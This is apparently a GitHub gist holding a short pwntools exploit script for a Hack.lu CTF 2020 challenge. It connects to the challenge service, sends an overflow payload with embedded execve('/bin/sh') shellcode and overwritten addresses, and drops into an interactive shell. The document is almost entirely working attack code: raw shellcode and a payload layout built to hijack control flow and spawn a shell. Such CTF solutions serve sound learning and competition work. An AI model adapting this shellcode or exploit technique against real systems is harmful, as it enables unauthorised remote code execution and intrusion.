@farazsth98
Created October 26, 2020 10:04
Secret Pwnhub Academy Awards Club 2 exploit script from Hack.lu CTF 2020 (ugly)
#!/usr/bin/env python3
from pwn import *

# SPARC target: pwntools packs p32() values as 32-bit big-endian.
context.arch = "sparc"
elf = ELF("./sparc-2")  # challenge binary (loaded, not otherwise used below)
p = remote("flu.xxx", 2025)  # CTF challenge service

# Raw shellcode bytes, sent as part of the payload.
shellcode = b"AA\x90\x90\xeb\x34\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc\xa2\x14\x63\x68\xe0\x3b\xbf\xf0\xc0\x23\xbf\xf8\x90\x23\xa0\x10\xc0\x23\xbf\xec\xd0\x23\xbf\xe8\x92\x23\xa0\x18\x94\x22\x80\x0a\x82\x10\x20\x3b\x91\xd0\x20\x08\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

# Payload layout: fixed prefix bytes, the shellcode, 102 bytes of padding,
# then two 32-bit values.
payload = b"1"*7 + b"3"*5
payload += b"4"
payload += b"\xff"
payload += shellcode
payload += b"A"*102
payload += p32(0xffffea00)
payload += p32(0xffffea68-8)

p.sendline(payload)
p.interactive()